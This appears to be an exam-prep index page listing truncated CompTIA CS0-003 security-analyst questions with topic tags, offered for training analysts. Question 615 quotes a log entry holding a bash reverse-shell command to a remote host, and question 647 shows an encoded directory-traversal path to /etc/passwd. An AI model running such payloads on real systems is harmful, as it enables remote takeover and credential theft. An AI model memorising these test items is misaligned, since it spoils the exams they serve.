CS0-003 Exam Questions
658 real CS0-003 exam questions with expert-verified answers and explanations. Page 13 of 14.
- Question #610Incident Response and Management
Which of the following best explains the importance of playbooks for incident response teams?
incident response playbooksincident managementoperational efficiency - Question #611Security Operations
Alerts from the security dashboard are reporting a cloud-based host is suspected to be corrupt. The OS is not loading. The initial investigation concludes that the OS files were mo...
FIMfile integrity monitoringcloud securitysecurity controls - Question #612Security Operations
A company received a shipment of new network switches. Immediately after installing the switches, a security analyst notices suspicious traffic coming from one of the new switches....
supply chain attackthreat actornetwork security - Question #613Security Operations
Which of the following best describes the benefit of implementing a PAM solution?
PAMprivileged access managementaccess control - Question #614Incident Response and Management
During the triage of a SIEM alarm, a security analyst identifies the following activity on a .bash_history file: Which of the following actions should the analyst take?
SIEM triagebash historydata exfiltrationincident response - Question #615Security operations
A security analyst identifies the following log entry in the web server logs: 10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+- i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%2...
web server logsRCEreverse shelllateral movement - Question #616Security operations
A security analyst receives an alert with the following packet capture: Which of the following conclusions should the analyst reach about this incident?
packet captureNmapnetwork scanningreconnaissance - Question #617Incident Response and Management
An after-action review of a ransomware attack on a company identified deficiencies in responsiveness and consistency. Which of the following choices would best facilitate improveme...
SOARincident responseautomationransomware - Question #618Incident Response and Management
A security analyst is performing a malware analysis on a device and receives the following instructions: - Reduce the blast radius of the potential threat. - Preserve forensic data...
malware analysisEDRcontainmentforensics - Question #619Incident Response and Management
Which of the following is the practice of controlling how evidence is handled to ensure its integrity during an investigation?
chain of custodyevidence integrityforensics - Question #620Security operations
A SOC analyst is reviewing the weekly EDR report. The report shows that the same application was blocked once every 24 hours. Which of the following tools should the analyst use to...
scheduled tasksendpoint monitoringWindows tools - Question #621Security operations
A finance department employee opens an unsolicited email that contains a malicious payload. The payload quickly spreads through the finance department, but does not affect other de...
network segmentationmalware propagationblast radius - Question #622Incident Response and Management
A security analyst is responding to an incident that is related to an unauthorized communication between systems. While triaging the event, the analyst obtains the following output...
process managementLinux commandsincident responsecontainment - Question #623Security operations
Which of the following explains why a company would consider enriching data before sending it to the SIEM?
SIEMdata enrichmentlog analysisthreat intelligence - Question #624Security operations
A company suspects a coordinated effort to attack their platform. Web server logs show malicious activity from many different source IP addresses located in different countries. Wh...
threat intelligenceIoCsSIEMattack correlation - Question #625Vulnerability Management
The DevSecOps team is remediating an SSRF issue on the company's public-facing website. Which of the following is the best mitigation technique to address this issue?
SSRFWAFweb application securityvulnerability mitigation - Question #626Incident Response and Management
A SOC manager is looking for a solution that can improve the response time and execute predetermined instructions. Which of the following is the best solution based on these requir...
SOARincident responseautomationorchestration - Question #627Security operations
Which of the following is the best technical method to protect sensitive data at an organizational level?
DLPdata protectionsensitive datadata exfiltration - Question #628Security operations
A company wants to grant access to identity administrators who are completing similar tasks. Which of the following access control models should the company use?
RBACaccess controlidentity management - Question #629Reporting and Communication
An organization's Chief Information Security Officer (CISO) is organizing a tabletop drill. The CISO has included several other executives in the meeting invitation for the drill,...
tabletop exercisecrisis communicationincident responsestakeholder management - Question #630Security operations
An organization wants to implement an identity and access management technology that is resistant to phishing attacks. Which of the following is the best technology to implement?
passwordless authenticationphishing resistanceIAMMFA - Question #631Security operations
A security analyst discovers that, over three months, an attacker has slowly created multiple accounts on a web server while avoiding detection. Which of the following best describ...
Threat actorsAdvanced Persistent Threat (APT)Cybersecurity threatsThreat intelligence - Question #632Security Operations
A SOC manager who recently switched companies notices that their new company's SOC analysts have significantly poorer operational metrics compared to their previous company, withou...
SOC operationsSOARteam moraleoperational efficiency - Question #633Incident Response and Management
The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help with this effort?
SOARphishing incidentstriage timeincident response automation - Question #634Vulnerability Management
A security analyst is testing a web application for vulnerabilities using Burp Suite. During the assessment, a capture of the following HTTP request and response is shown in the co...
web application securityCSRFBurp Suitevulnerability testing - Question #635Security operations
When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management...
IAMcloud migrationSaaS securityZTNA - Question #636Security operations
A security analyst is working on a suspicious email forwarded from a user. The email contains an attachment asking the user to open it. Which of the following should the security a...
DMARCemail authenticationattack originemail security - Question #637Security operations
A company discovers that its proprietary information is being sold on the dark web. A security analyst uses threat hunting to search for signs of compromise. After running a networ...
data exfiltrationthreat huntingnetwork packet captureICMP tunneling - Question #638Incident Response Management
An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: - Captures live memory and an image of...
chain of custodydigital forensicsevidence handlingincident investigation - Question #639Vulnerability Management
A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runs a scan to receive the follow...
vulnerability identificationplaintext credentialsnetwork scanninglog analysis - Question #640Vulnerability Management
A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improve security. Which of...
vulnerability prioritizationrisk assessmentremediation planning - Question #641Incident Response Management
To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing m emergency situations or incide...
tabletop exerciseincident response planemergency preparednessregulatory compliance - Question #642Security operations
During a routine review of DNS logs, a security analyst observes that Host X has been making frequent DNS requests to domains with random alphanumeric strings (e.g.. atd8ekthj.xyz)...
DNS anomaliesC2 communicationthreat intelligencehost compromise - Question #643Security operations
The website of a large retail chain is falling to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is the best corrective a...
HTTPS enforcementHSTSweb server securitysecure configuration - Question #644Security operations
A security analyst investigates a malware alert from a critical system. The following information is present in the ticket: Which of the following should the analyst do first?
malware analysisincident investigationalert triagesecurity operations - Question #645Vulnerability Management
An application security analyst needs to test a web application for input validation vulnerabilities. The analyst does not have the source code and does not have documentation for...
fuzzinginput validationapplication security testingvulnerability testing - Question #646Vulnerability Management
A security analyst IS comparing the results of the past and current active credentialed vulnerability scans: Past scan: Current scan: Which of the following should the analyst do n...
vulnerability scanningrisk reportingremediation validationmanagement communication - Question #647Security operations
An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been discovered. Which of the fo...
directory traversalweb server logsreconnaissanceattack identification - Question #648Vulnerability Management
The security team is reviewing a list of vulnerabilities present on the environment, and they want to prioritize the remediation based on the CVSS v4.0 metrics: Which of the follow...
CVSSvulnerability prioritizationrisk managementremediation - Question #649Security operations
A security analyst is investigating an unusually high volume of requests received on a web server. Based on the following command and output: Which of the following best describes...
directory brute forceweb server logsattack identificationcommand-line analysis - Question #650Security operations
A security analyst discovers multiple log entries from a recently acquired tool that was bundled as a YUM package. Those entries point to attempts of privilege escalation. Which of...
privilege escalationpackage integrityGPG checkvulnerability analysis - Question #651Security operations
A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools should the company implem...
DLPdata loss preventionsecurity controlsinformation protection - Question #652Vulnerability Management
A security analyst is implementing a process to perform vulnerability management on an ОТ environment: - Systems must remain on an isolated network. - The process should focus on e...
OT securityvulnerability managementagentless sensorsnetwork segmentation - Question #653Vulnerability Management
Hotspot Question A healthcare organization must develop an action plan based on the findings from a risk assessment. The action plan must consist of a recommended list of security...
risk assessmentsecurity controlsremediationdata deidentification - Question #654Vulnerability Management
A managed service provider manages servers in customer-assigned Internet Protocol spaces. The provider discovers that these servers are not included in scheduled network scans, but...
agent-based scanningvulnerability scanningnetwork scanningcustomer permissions - Question #655Incident Response Management
An organization's security operations center (SOC) team prioritizes confidentiality and integrity over monetary considerations. The SOC team contains a quickly progressing ransomwa...
risk appetiteransomware incidentincident impactorganizational priorities - Question #656Vulnerability Management
A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the following information:...
Vulnerability prioritizationCVSS scoringVulnerability assessmentRisk analysis - Question #657Security operations
Which of the following should a cybersecurity analyst utilize when a notification is inaccurate?
Alert managementSIEM tuningFalse positivesSecurity operations - Question #658Security operations
Which of the following are characteristics of Zero Trust Network Access?
Zero Trust ArchitectureNetwork securityZTNA principles - Question #659Incident Response Management
A security operations (SOC) manager develops response mechanisms as part of playbook development efforts. The SOC manager needs to accomplish the following: - Document adversarial...
Cyber Kill ChainThreat intelligence frameworksAdversarial tacticsPlaybook development